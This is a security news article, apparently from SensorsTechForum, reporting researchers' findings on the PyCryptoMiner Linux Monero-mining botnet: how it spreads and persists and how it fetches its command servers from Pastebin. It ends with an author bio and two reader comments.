A Linux-based Monero miner botnet, which has been dubbed PyCryptoMiner has been discovered by security researchers. The botnet which is based on a cryptocurrency miner has earned cybercriminals at least 158 Monero which amounts to $63,000.
PyCryptoMiner has been written in Python which has made it possible for the botnet’s operators to keep it under the radar.
“Unlike a binary malware alternative, a scripting language-based malware is more evasive by nature as it can be easily obfuscated. It is also executed by a legitimate binary, which could be one of the PERL/Python/Bash/Go/PowerShell interpreters shipped with almost every Linux/Windows distribution,” researchers from F5 Networks said in their report.
PyCryptoMiner Technical Details
Whoever is operating this botnet is also using brute-force attacks targeting Linux systems with exposed SSH ports. In case the password is uncovered then cybercriminals deploy Python scripts and install the Monero miner malware.
Researchers also believe that cybercriminals are also using an exploit for the JBoss server in their campaign which has been identified as CVE-2017-12149. However, the deployment of brute-force and the exploit of SSH are also part of cybercriminals’ attack arsenal.
What is interesting is that the PyCryptoMiner botnet doesn’t have hard-coded addresses of its command and control servers as it receives them from Pastebin posts. The botnet is also capable of acting as a scanner node meaning that it scans the Internet for Linux machines with open SSH ports, and attempts to guess the SSH logins. In case of a success, the malware uses a simple base64-encoded spearhead Python script which connects to the command and control server to execute more Python code, researchers said. The script itself is positioned in the main controller bot and is capable of the following activities:
- Becoming persistent on the compromised machine by registering as a cron job ( a time-based job scheduler in Unix-like computer operating systems);
- Collecting details about the compromised machine like information on the number of CPUs.
- Collected information is typically sent to the command and control server.
PyCryptoMiner Botnet Activity
Apparently, the botnet is currently inactive, as its servers are offline. Nonetheless, this doesn’t mean that it won’t be reactivated in new malicious and crypto mining campaigns. If the botnet operator updates the Pastebin posts to point to a new command and control server, then the botnet can quickly be brought back online.
As already mentioned, the botnet is also designed to dig for potential exploit possibilities of CVE-2017-12149, a recently disclosed vulnerability. This means that vulnerable JBoss servers may be the next target of the PyCryptoMiner.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me:
This is hardly a malware. If you get access to the machine, you can do a lot of things other than just running a mining script.
Hello, yes, but it all comes down to who configured it. Some malware authors often aim to embed legitimate miners in malware applications and add other “things” that the malware does. These are functions, that help it to propagate as well as self-update, copy itself and remain obfuscated.
As it is stated in the article the miner is part of an extensive Python that is modular in nature. As a consequence the hacker operators can execute a variety of malware behaviour.
Due to the recent rise of miners it is important for us to track all current events.